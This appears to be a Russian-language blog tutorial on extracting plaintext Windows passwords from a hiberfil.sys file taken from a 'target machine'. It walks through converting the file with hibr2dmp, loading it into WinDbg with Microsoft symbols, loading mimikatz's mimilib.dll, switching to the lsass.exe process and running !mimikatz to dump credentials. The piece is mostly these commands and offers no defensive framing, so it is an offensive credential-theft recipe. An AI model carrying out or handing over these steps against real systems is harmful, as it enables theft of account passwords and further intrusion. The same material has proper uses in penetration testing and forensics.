Утилита mimikatz, позволяющая извлекать учётные данные Windows из LSA в открытом виде, существует с 2012 года, однако помимо хорошо освещённого функционала восстановления паролей из памяти работающей ОС у неё есть ещё одна довольно интересная возможность. Далее я приведу пошаговую инструкцию, как при помощи нехитрых действий извлечь учётные данные из файла hiberfil.sys.

Подготовка

Для осуществления задуманного нам понадобятся следующие утилиты:

Действия

  1. Получаем файл hiberfil.sys с целевой машины.

  2. Конвертируем файл в формат понятный WinDbg

hibr2dmp.exe d:\temp\hiberfil.sys c:\temp\hiberfil.dmp **
**

Процесс может занять довольно продолжительное время

1.jpg

  1. Запускаем WinDbg и открываем полученный файл

File -> Open Crash Dump

  1. Настраиваем отладочные символы

Открываем File **-** >** **Symbol File Path… **и вписываем следующую строчку

SRVc:\symbolshttp://msdl.microsoft.com/download/symbols **
**

Вместо c:\symbols, естественно, может быть любой каталог, в который будут загружены символы

2.png

В командной строке дебаггера пишем

0: kd> .reload /n **
**

Ждём окончания загрузки символов

1.png

  1. Указываем путь к библиотеке mimilib.dll (находится в каталоге с mimikatz)

0: kd> .load z:\Soft\Security\Passwords\Mimikatz\x64\mimilib.dll **
**

1.png

  1. Находим адрес процесса lsass.exe

0: kd> !process 0 0 lsass.exe **
**

1.png

В данном случае адрес: fffffa800a7d9060

  1. Переключаем контекст процесса

0: kd> .process /r /p fffffa800a7d9060 **
**

1.png

  1. Запускаем mimikatz и получаем пароли в открытом виде

0:kd>** !mimikatz** **
**

1.png **
**

**
**

**
**

Ссылки по теме

**
**

Раскрытие учетных данных в Microsoft Windows: http://www.securitylab.ru/vulnerability/420418.php

LSA Authentication: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs.85).aspx

What is Digest Authentication:https://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx

**
**